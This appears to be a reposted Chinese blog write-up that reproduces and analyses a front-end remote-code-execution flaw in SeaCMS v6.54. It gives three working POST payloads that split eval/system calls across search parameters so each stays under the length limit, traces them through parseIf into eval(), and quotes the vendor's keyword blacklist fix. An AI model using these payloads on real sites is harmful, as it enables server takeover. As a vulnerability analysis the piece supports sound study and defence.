代码审计之seacms v6.54 前台Getshell 复现分析

最新推荐文章于 2024-01-25 11:45:00 发布
最新推荐文章于 2024-01-25 11:45:00 发布
阅读量452 收藏 2
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/wfzWebSecuity/p/11100975.html
版权

1.环境:

php5.5.38+apache+seacms v6.54

上一篇文章针对seacms v6.45 进行了分析,官方给出针对修复前台geishell提供的方法为增加:

$order = ($order == "commend" || $order == "time" || $order == "hit") ? $order : "";

 并且在v6.54中增加了对传入变量的长度限制,限制为20个字符之内,因此单一针对一个变量的绕过方法不满足长度要求,所以在该版本中才进行了多次替换绕过

每一次传进去的长度刚好20,思路挺不错的(当然小于此长度也可以)

但是在echoSearchPage()函数中声明的global变量并不是只有$order一个,可以利用其他的参数构造payload进入$content变量,从而导致代码执行,整个漏洞链构造流程环环相扣,最终聚焦在eval()函数上

2.poc1:

http://192.168.0.6/seacms654/search.php
POST:
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

poc2:

 

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan={searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9])&9=phpinfo();

 

poc3:

 

searchtype=5&searchword={if{searchpage:year}&year=:s{searchpage:area}}&area=y{searchpage:letter}&letter=st{searchpage:lang}&yuyan=em{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9])&9=whoami //命令执行

 

3.演示效果:

4.漏洞分析

因为最终利用的是parseif函数,并且要利用到global声明的变量,因此我选择在65行和214行下断点进行分析

 

 执行payload,使用F8开始单步调试,我们关注以下7个变量的值:

从157行开始,利用从global声明的变量开始对$content中的内容进行替换

 第1处替换:

首先使用$searchword变量的值进行了替换,可以看到替换以后与之前的对比

 第2处替换:

将$year变量的值替换了进来

 第3处替换:

将变量$area的值替换了进来,

 

 第4处替换:

将变量$letter的值替换了进来

 第5处替换:

将变量$yuyan的值替换了进来

 第6处替换:

将$jq变量的值替换进来

 第7处替换:

将$ver变量的值替换进来

触发远程代码执行,到此已经拼接成了完整的payload,此时$strIf的内容没有任何过滤就带入了eval函数执行!!!

eval(join($_POST[9]))

 

 官方修复方法:

在parseIf函数中添加了黑名单,替换了一些敏感字符串

function parseIf($content){

        if (strpos($content,'{if:')=== false){

        return $content;

        }else{

        $labelRule = buildregx("{if:(.*?)}(.*?){end if}","is");

        $labelRule2="{elseif";

        $labelRule3="{else}";

        preg_match_all($labelRule,$content,$iar);

foreach($iar as $v){

    $iarok[] = str_replace(array('unlink','opendir','mysqli_','mysql_','socket_','curl_','base64_','putenv','popen(','phpinfo','pfsockopen','proc_','preg_','_GET','_POST','_COOKIE','_REQUEST','_SESSION','eval(','file_','passthru(','exec(','system(','shell_'), '@.@', $v);

 

转载于:https://www.cnblogs.com/wfzWebSecuity/p/11100975.html

weixin_30872867
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
海洋cms V6.54.zip_seacms_seacms v6.54_seacms6.54_海洋CMS_海洋cms V6.54
09-24
seacms v6.54 full update
wei php getshell,海洋cms最新版前台getshell(附靶机)
weixin_30587041的博客
04-06 494
cms版本:6.45官网好像是6.48版本了直接上代码[mw_shl_code=applescript,true]function parseIf($content){if (strpos($content,'{if:')=== false){return $content;}else{$labelRule = buildregx("{if.*?)}(.*?){end if}","is");$la...
Seacms6.45最新前台getshell漏洞
pygain的博客
02-20 6531
Seacms最新的版本为6.45 更新后的版本存在着一个前台getshell问题
GETSHELL学习总结
weixin_44508748的博客
06-29 4452
分类 带有漏洞的应用 redis 、tomcat、解析漏洞、编辑器、FTP 常规漏洞 sql注入、上传、文件包含、命令执行、Struts2、代码反序列化 后台拿shell 上传、数据库备份、配置插马 关于各种带有漏洞的应用以及OWASP Top10常规漏洞需要不断的积累,打造自己的核心的知识库,道路且长。本文仅记录最近对常见cms后台getshell的学习总结 网站getshell方法 1.数据库备份拿shell 如果网站后台具有数据库备份功能,可以将webshell格式先修改为允许上传的文件格式如jpg,
seacms_v6.4(海洋cms)前台RCE 分析
RestoreJustice的博客
03-19 904
在common.php中对GET,POST,COOKIE等请求传入的全局变量中的键值对转换成变量,并对其中的值使用addslashes()转义预定义的特殊符号。在eval()函数中,首先要闭合前面的if语句,可以构造1)phpinfo();首先search.php入手,这个文件包含了common.php和main.class.php。参数没做严格的限制,就将其传入了模板文件中,然后使用eval()执行模板中包含。的代码,通过闭合拼接语句的方式,插入恶意代码,实现远程命令执行。在eval()函数中,
海洋cms v6.53 v6.54版本漏洞复现
weixin_30243533的博客
10-10 793
海洋cms v6.53 v6.54版本漏洞复现 参考链接: 今天发现freebuf上一篇海洋cms的漏洞,来复现一下。 http://www.freebuf.com/vuls/150042.html 漏洞原理: 文章里说的很清楚echoSearchPage函数中的content变量传给了parself函数,跟踪代码,找到./include/main.class.php,可以看到pars...
Seacms漏洞
Grey的博客
07-10 5000
海洋CMS6.45前台getshell漏洞复现结果:http://127.0.0.1/CMS/seacms_v6.4/upload/search.phppost:searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}1.漏洞的触发点是在search.php 中的echoSearchPage()函数可以触发漏洞。常规的分析都是先找...
i春秋CTF训练 Web Test
椰奶冻不安全的博客
07-05 1484
Web Test 题目内容:善于查资料,你就可以拿一血了。 题目链接请在i春秋申请 根据提示直接在搜索引擎上查询海洋cms漏洞,发现曾经有过前台getshell,用poc试一下 searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpa
i春秋——“百度杯”CTF比赛 九月场——Test(海洋cms / seacms 任意代码执行漏洞)...
weixin_30417487的博客
10-14 609
打开发现是海洋cms,那就搜索相关漏洞 找到一篇介绍海洋cms的命令执行漏洞的文章:https://www.jianshu.com/p/ebf156afda49 直接利用其中给出的poc /search.php searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&...
[漏洞复现]seacms(v6.53)代码执行漏洞
Vicl1fe的博客
12-30 2965
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://blog.csdn.net/weixin_44897902/article/details/100853036 https://www.jianshu.com/p/a3a18f233184?tdsourcetag=s_pctim_aiomsg 环境: 链接:https://pan.ba...
seacms6.53源码
10-11
是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。
74CMS 3.0 SQL注入漏洞后台.docx
07-07
74CMS 3.0 SQL注入漏洞后台演示,利用 sqlmap与burpsuit注入,需具备php基础
JLinkARM.dll_V6.54C
01-05
JLinkARM.dll for jlink V6.54C 下载后重命名为JLinkARM.dll, 替换Keil_v5\ARM\Segger下的JLinkARM.dll和你jlink安装位置下的JLinkARM.dll
RealThinClientSDK v6.54 FS.rar
07-27
RealThinClientSDK v6.54 FS,非常稳定的万能中间件,此版本带源代码,适合C++以及delphi xe 10.x版本,主要用于web开发,也可以用于CS开发。带demo
JLink_Windows_V654a.exe
11-05
SEGGER官网下载,Windows平台版本,下载日期为2019年11月05日,截至下载日期,目前最新版本,该软件可用于更新Keil MDK的J-Link版本,方便大家下载,共同进步
RealThinClientSDK v6.54 FS.zip
06-24
RealThinClientSDK v6.54 FS.zip
cms中getshell的各种姿势
最新发布
久恙502的博客
01-25 451
渗透学习,简要记录
记一次海洋cms任意代码执行漏洞拿shell(url一句话)
Sea_Sand息禅
03-06 8684
实验环境:海洋CMS6.54(后续版本已该洞已补) 1、后台登录尝试 这个站点是个测试站,站里没什么数据。 进入admin.php,是带验证码的后台登录系统,没有验证码的可以用bp爆破。有验证码的也有一个爆破软件,可以识别验证码的,但是试了试用不了。 后天失败。。。 2、网上搜集该CMS的漏洞 刚才也说了,这个站没什么数据,都是空的,无上传点。 百度搜索海洋CMS的漏洞,有好几...
cms前台getshell分析
IT-Andy
12-18 1265
前言 毫无套路的在cnvd上看见了一个漏洞,毫无套路的想着分析一下 一脸懵逼的Getshell 官网地址:http://www.earcms.net/ 先到官网把源码下载下来搭建一下,结果发现源码是混淆过的 这种混淆方式很常见,解密也不难,因为已经知道是前台文件上传导致的getshell,所以暂时不需要全部解密出来一点点分析,暂时只关注他的上传点。 毫无套路的搭建完成后我们看到...
如何写一个rospy代码,让ros小海龟在(5.54,5.54), (5.54,8.54), (6.54,7.54), (5.54,6.54), (5.54,5.54)循环定点移动,要求小海龟先转弯后直行
05-01
以下是一个示例代码,可以让ROS小海龟在给定的5个点之间循环移动,每次到达一个点后,小海龟会先转弯再向下一个点移动。 ```python #!/usr/bin/env python import rospy from geometry_msgs.msg import Twist from turtlesim.msg import Pose # 定义目标点 points = [(5.54, 5.54), (5.54, 8.54), (6.54, 7.54), (5.54, 6.54), (5.54, 5.54)] # 初始化当前目标点和小海龟的目标角度 current_point = 0 target_angle = 0 # 定义回调函数,获取小海龟的当前位置 def pose_callback(pose): global current_point, target_angle x = pose.x y = pose.y # 计算小海龟当前位置与目标点之间的距离 distance_to_target = ((points[current_point][0] - x) ** 2 + (points[current_point][1] - y) ** 2) ** 0.5 # 如果小海龟已经到达了当前目标点,则更新目标点和目标角度 if distance_to_target < 0.1: current_point = (current_point + 1) % len(points) target_angle = get_target_angle(x, y, points[current_point][0], points[current_point][1]) # 计算小海龟需要转动的角度 angle_to_target = get_angle_to_target(pose.theta, target_angle) # 发布速度控制指令 cmd_vel = rospy.Publisher('/turtle1/cmd_vel', Twist, queue_size=10) vel_msg = Twist() vel_msg.linear.x = 1.0 vel_msg.angular.z = angle_to_target cmd_vel.publish(vel_msg) # 计算小海龟需要转动的角度 def get_angle_to_target(current_angle, target_angle): angle = target_angle - current_angle if angle > 3.14159: angle -= 2 * 3.14159 elif angle < -3.14159: angle += 2 * 3.14159 return angle # 计算小海龟需要转向的目标角度 def get_target_angle(x1, y1, x2, y2): return math.atan2(y2 - y1, x2 - x1) if __name__ == '__main__': rospy.init_node('turtle_waypoint_navigation', anonymous=True) # 订阅小海龟的位置信息 pose_sub = rospy.Subscriber('/turtle1/pose', Pose, pose_callback) rospy.spin() ``` 需要注意的是,这个代码中假设小海龟的初始位置在第一个目标点处。如果小海龟的初始位置不在第一个目标点处,需要在代码中进行一些修改。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值